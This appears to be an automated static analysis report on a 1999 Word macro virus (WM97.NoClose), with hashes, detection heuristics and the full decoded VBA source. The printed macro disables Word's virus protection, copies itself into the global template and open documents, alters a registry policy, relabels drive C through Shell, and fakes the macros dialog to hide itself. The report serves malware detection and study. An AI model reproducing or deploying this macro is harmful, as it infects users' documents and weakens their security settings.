Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 91245fb0977b9dc4…

MALICIOUS

Office (OLE)

33.0 KB Created: 1999-04-16 20:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6611c5f92925201e5de3700fa07b4175 SHA-1: 37e8f0e02055504ec6667a8f57b3619b09ad92a0 SHA-256: 91245fb0977b9dc4736e74916f7cfd4a92525d72ddc131f4a4b65c11517230d0
300 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a legacy WordBasic AutoClose macro that attempts to disable virus protection and save a VBA component to 'c:\windows\system\no32close.sys'. It also attempts to set a registry value 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose' to '01' and execute 'label c: WM_NoClose', indicating an attempt at persistence or system modification. The macro's intent is to disable security features and potentially establish a foothold.

Heuristics 6

  • ClamAV: Doc.Trojan.Closer-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Closer-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3044 bytes
SHA-256: 81790b32ce3ddf6357f02505424b3ef7c4f57fecdb9cd53e376914aedd37e191
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "noclose"
Sub AutoClose()
On Error Resume Next
Randomize

With Application
    .ActiveDocument.ReadOnlyRecommended = False
    .DisplayAlerts = wdAlertsNone
    .EnableCancelKey = wdCancelDisabled
    .ScreenUpdating = False
    .ShowVisualBasicEditor = False
    .StatusBar = "WM97.NoClose -=[Jack Twoflower]=-"
End With
With Options
    .VirusProtection = False
    .SaveNormalPrompt = False
    .ConfirmConversions = False
End With

Set ad = ActiveDocument.VBProject.VBComponents
Set nt = NormalTemplate.VBProject.VBComponents

z$ = "c:\windows\system\no32close.sys"
n$ = "noclose"

Application.VBE.ActiveVBProject.VBComponents(n$).Export z$

ai = 0
ni = 0

For i = 1 To nt.Count
    If nt(i).Name = n$ Then ni = 1
Next i

For i = 1 To ad.Count
    If ad(i).Name = n$ Then ai = 1
Next i

If ni = 0 Then nt.import z$: NormalTemplate.Save
If ai = 0 Then ad.import z$: ActiveDocument.Save

If Day(Now()) = Int((Rnd * 31) + 1) Then
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoClose") = "01"
    Shell ("label c: WM_NoClose"), vbHide
End If
End Sub

Sub ExtrasMakro()
Dim x

ReDim Combobox1__$(0)
Combobox1__$(0) = ""
ReDim Textbox1__$(0)
Textbox1__$(0) = ""
ReDim DropListBox2__$(0)

DropListBox2__$(0) = "Normal.dot (Globale Dokumentvorlage)"

WordBasic.BeginDialog 620, 280, "Makros"
    WordBasic.Text 7, 6, 93, 13, "Makro&name:", "Text3"
    WordBasic.ComboBox 7, 23, 435, 170, Combobox1__$(), "Combobox1"
    WordBasic.PushButton 470, 14, 137, 21, "&Ausführen", "Definierbar2"
    WordBasic.CancelButton 470, 38, 137, 21
    WordBasic.PushButton 470, 72, 137, 21, "&Schrittweise prüfen", "Definierbar3"
    WordBasic.PushButton 470, 96, 137, 21, "&Bearbeiten", "Definierbar4"
    WordBasic.PushButton 470, 130, 137, 21, "&Erstellen", "Definierbar5"
    WordBasic.PushButton 470, 154, 137, 21, "&Organisieren", "Definierbar6"
    WordBasic.PushButton 470, 178, 137, 21, "&Organisieren...", "Definierbar7"
    WordBasic.Text 7, 200, 93, 13, "Ma&kros in:", "Text1"
    WordBasic.DropListBox 90, 196, 354, 19, DropListBox2__$(), "Listbox2"
    WordBasic.Text 7, 222, 109, 13, "Beschreibung:", "Text2"
    WordBasic.TextBox 7, 235, 437, 38, Textbox1__$()
WordBasic.EndDialog
 
Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog
x = WordBasic.Dialog.UserDialog(dlg)
Select Case x
    Case 0
        WordBasic.Cancel
    Case 1 To 6
        WordBasic.MsgBox "Nicht genug Arbeitsspeicher! Schließen Sie eine oder mehrere Anwendungen!", "WordBasic Fehler=7", 48
End Select
End Sub
Sub AnsichtVBCode()
End Sub
Sub AnsichtCode()
End Sub
Sub FormatFormatvorlage()
End Sub
Sub DateiDokVorlage()
End Sub